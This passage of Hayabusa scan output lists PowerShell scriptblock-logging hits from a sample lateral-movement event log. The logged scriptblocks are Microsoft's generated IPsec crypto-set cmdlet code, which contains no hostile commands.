[object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodPa",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecMainModeCryptoSet' -Alias '*' function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeCryptoSet' -Alias '*' function Set-NetIPsecMainModeCryptoSe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.611 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"t { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] 